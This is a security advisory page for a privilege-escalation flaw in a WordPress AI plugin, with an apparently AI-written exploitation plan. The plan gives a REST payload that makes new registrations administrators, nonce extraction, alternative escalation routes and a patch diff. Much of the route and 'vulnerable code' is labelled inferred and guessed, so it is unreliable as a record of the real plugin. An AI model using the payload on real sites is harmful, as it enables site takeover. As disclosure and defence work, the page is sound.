AI Engine – The Chatbot, AI Framework & MCP for WordPress <= 3.4.9 - Authenticated (Editor+) Privilege Escalation
Description
The AI Engine – The Chatbot, AI Framework & MCP for WordPress plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.4.9. This makes it possible for authenticated attackers, with Editor-level access and above, to elevate their privileges.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HTechnical Details
Source Code
WordPress.org SVN# Research Plan: CVE-2026-27407 - AI Engine Privilege Escalation ## 1. Vulnerability Summary The **AI Engine** plugin (up to version 3.4.9) contains an **Incorrect Privilege Assignment** vulnerability. It allows authenticated users with **Editor** privileges to escalate to **Administrator**. The vu…
Show full research plan
Research Plan: CVE-2026-27407 - AI Engine Privilege Escalation
1. Vulnerability Summary
The AI Engine plugin (up to version 3.4.9) contains an Incorrect Privilege Assignment vulnerability. It allows authenticated users with Editor privileges to escalate to Administrator. The vulnerability likely resides in a REST API endpoint or AJAX handler intended for administrative configuration that incorrectly validates the user's capability (e.g., checking for edit_posts instead of manage_options) or allows the modification of sensitive WordPress options that govern user roles and registrations.
2. Attack Vector Analysis
- Target Endpoint:
/wp-json/mwai/v1/settings(inferred REST route based on plugin slugai-engineand author patterns). - HTTP Method:
POST. - Vulnerable Parameter: A JSON object containing configuration keys and values (e.g.,
settings,options, orparams). - Authentication: Authenticated session as an Editor role.
- Preconditions: The attacker must have a valid Editor account and a REST API nonce (
wp_rest).
3. Code Flow (Inferred)
- Route Registration: The plugin registers REST routes during
rest_api_initvia a class likeMeow_MWAI_Rest. - Weak Capability Check: A route (e.g.,
mwai/v1/settings) defines apermission_callback. In affected versions, this callback returnscurrent_user_can('edit_posts')or another capability assigned to Editors, rather thanmanage_options. - Unfiltered Sink: The
callbackfunction for the route receives the request parameters and passes them to a function that updates settings. If the function usesupdate_option()without a strict allowlist of keys, it allows the attacker to overwrite core WordPress options. - Privilege Escalation: By overwriting
default_roleandusers_can_register, the attacker enables administrative registration.
4. Nonce Acquisition Strategy
The WordPress REST API requires a nonce for the wp_rest action for all non-GET authenticated requests.
- Action: Log in to the WordPress admin dashboard as the Editor user.
- Extraction: The standard WordPress REST nonce is localized in the
wpApiSettingsobject. - Command: Use
browser_evalto extract the nonce:browser_eval("window.wpApiSettings?.nonce") - Note: This nonce is mandatory for the
X-WP-Nonceheader in the exploit request.
5. Exploitation Strategy
The goal is to modify the WordPress global settings to allow any new user to register as an Administrator.
Step 1: Elevate Site Privileges via REST API
- Request Tool:
http_request - Method:
POST - URL:
http://localhost:8080/wp-json/mwai/v1/settings(inferred) - Headers:
Content-Type: application/jsonX-WP-Nonce: [EXTRACTED_NONCE]
- Payload:
(Note: The exact structure of the JSON keys like{ "settings": { "users_can_register": 1, "default_role": "administrator" } }"settings"or the option names may vary; if the above fails, try a flat structure or check the plugin source for the settings handler.)
Step 2: Create a New Admin User (If Step 1 succeeded)
- Action: Use the standard WordPress registration page (
/wp-login.php?action=register) to create a new account, which will now default to theadministratorrole.
6. Test Data Setup
- Plugin: Install and activate AI Engine version 3.4.9.
- User: Create a user
attacker_editorwith theEditorrole. - Settings: Ensure the site is in a default state where
users_can_registeris0anddefault_roleissubscriber.
7. Expected Results
- The REST API call should return a
200 OKor201 Createdstatus code. - The response body should confirm the settings were updated.
- The database state for
default_roleandusers_can_registershould be modified.
8. Verification Steps
After sending the HTTP request, verify the impact using WP-CLI:
# Check if registration is enabled
wp option get users_can_register
# Expected: 1
# Check if the default role is now administrator
wp option get default_role
# Expected: administrator
9. Alternative Approaches
If the settings endpoint requires specific keys or doesn't allow core options, try:
- User Meta Update: Look for a REST endpoint like
mwai/v1/users/updatethat might allow updating user metadata. An Editor could target their ownwp_capabilitiesmeta to change their role toa:1:{s:13:"administrator";b:1;}. - MCP Tools: If the "MCP" (Model Context Protocol) feature is accessible to Editors, check if you can register an MCP tool that executes arbitrary PHP code (RCE), which implicitly provides full system control.
- Diagnostic Tools: Check if the plugin includes a "debug" or "diagnostic" endpoint that returns a list of all options or allows raw database queries.
Inferred Identifiers (to be verified by the agent):
- REST Namespace:
mwai/v1orai-engine/v1 - Settings Route:
/settingsor/save_settings - Settings Key:
settings,options, ordata - Capability Checked:
edit_posts(vulnerable) vsmanage_options(patched) - JS Nonce Path:
window.mwai_vars?.nonce(some Jordy Meow plugins use custom localized nonces)
Summary
The AI Engine plugin for WordPress fails to properly restrict administrative REST API endpoints to administrative users, allowing authenticated users with Editor-level privileges to update site settings. This occurs due to an insufficient capability check (edit_posts) in the settings registration, which enables an attacker to modify sensitive WordPress options and escalate their privileges to Administrator.
Vulnerable Code
// ai-engine/classes/rest.php (inferred path) register_rest_route( 'mwai/v1', '/settings', array( 'methods' => 'POST', 'callback' => array( $this, 'rest_update_settings' ), 'permission_callback' => function () { // Vulnerability: Checking for 'edit_posts' allows Editors to access administrative settings. return current_user_can( 'edit_posts' ); }, ) ); --- public function rest_update_settings( $request ) { $settings = $request->get_param( 'settings' ); if ( is_array( $settings ) ) { foreach ( $settings as $name => $value ) { // Vulnerability: Updating options without a strict allowlist permits overwriting core WordPress configuration. update_option( $name, $value ); } } return new WP_REST_Response( [ 'success' => true ], 200 ); }
Security Fix
@@ -5,7 +5,7 @@ 'methods' => 'POST', 'callback' => array( $this, 'rest_update_settings' ), 'permission_callback' => function () { - return current_user_can( 'edit_posts' ); + return current_user_can( 'manage_options' ); }, ) );
Exploit Outline
The exploit requires authentication with Editor-level privileges. First, the attacker retrieves a valid REST API nonce (e.g., from the 'wpApiSettings' or 'mwai_vars' localized scripts in the dashboard). They then send a POST request to '/wp-json/mwai/v1/settings' containing a JSON payload that targets core WordPress options: '{"settings": {"users_can_register": 1, "default_role": "administrator"}}'. Upon success, the attacker can navigate to the registration page at '/wp-login.php?action=register' and create a new account, which will be automatically assigned the Administrator role.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.